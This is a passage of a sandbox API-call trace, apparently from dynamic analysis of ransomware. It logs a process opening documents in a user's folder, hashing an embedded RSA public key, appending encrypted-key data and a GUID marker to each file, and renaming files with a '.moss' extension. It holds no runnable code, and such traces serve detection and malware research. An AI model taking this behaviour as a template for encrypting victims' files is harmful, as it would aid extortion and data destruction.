HALPmcxz\\Documents\\OfhlPq h4.ppt") returned=".ppt" [0169.754] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OfhlPq h4.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ofhlpq h4.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.754] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=100778) returned 1 [0169.755] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.757] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x18984, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.757] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.758] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x189aa, lpOverlapped=0x0) returned 1 [0169.759] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.759] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.759] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.759] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.760] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.760] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.760] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.760] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.760] GetLastError () returned 0x0 [0169.760] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.760] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.760] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.760] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.760] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.761] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.762] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x189aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.762] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.762] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.762] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.762] CloseHandle (hObject=0x664) returned 1 [0169.764] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OfhlPq h4.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ofhlpq h4.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OfhlPq h4.ppt.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ofhlpq h4.ppt.moss")) returned 1 [0169.765] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbd45cd0, ftCreationTime.dwHighDateTime=0x1d5e7cc, ftLastAccessTime.dwLowDateTime=0xd069e910, ftLastAccessTime.dwHighDateTime=0x1d58411, ftLastWriteTime.dwLowDateTime=0xd069e910, ftLastWriteTime.dwHighDateTime=0x1d58411, nFileSizeHigh=0x0, nFileSizeLow=0x14f94, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ooi75yScG2n4JW.pptx", cAlternateFileName="OOI75Y~1.PPT")) returned 1 [0169.765] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ooi75yScG2n4JW.pptx") returned=".pptx" [0169.765] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ooi75yScG2n4JW.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ooi75yscg2n4jw.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.766] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=85908) returned 1 [0169.766] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.769] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x14f6e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.769] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.770] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.770] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x14f94, lpOverlapped=0x0) returned 1 [0169.771] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.771] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.771] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.771] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.772] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.772] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.772] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.772] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.772] GetLastError () returned 0x0 [0169.772] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.772] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.772] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.772] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.772] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.772] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.772] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.772] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.772] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.772] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14f90) returned 0x3b62d40 [0169.773] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.773] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45aa0 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbff0 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45ae8 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc008 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc038 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc050 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0169.773] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0169.773] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc038 | out: hHeap=0xcd0000) returned 1 [0169.773] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc050 | out: hHeap=0xcd0000) returned 1 [0169.773] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.773] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.773] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2a0 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc050 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fc038 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.773] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0169.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc050 | out: hHeap=0xcd0000) returned 1 [0169.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc038 | out: hHeap=0xcd0000) returned 1 [0169.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0169.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0169.774] GetCurrentThreadId () returned 0x324 [0169.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b491d0 [0169.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35ceae8 [0169.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0169.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.774] GetCurrentThreadId () returned 0x324 [0169.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362c768 [0169.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.774] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc038 [0169.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0169.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0169.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0169.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0169.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc050 [0169.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0169.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0169.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc020 [0169.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0169.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbb70 [0169.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd320 [0169.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0169.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.775] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc068 [0169.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc90 [0169.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0169.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0169.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0169.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0169.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc038 | out: hHeap=0xcd0000) returned 1 [0169.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc038 [0169.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b449a8 [0169.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0169.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b44bb8 [0169.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0xdc53e8 [0169.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0169.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc038 | out: hHeap=0xcd0000) returned 1 [0169.776] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b48820 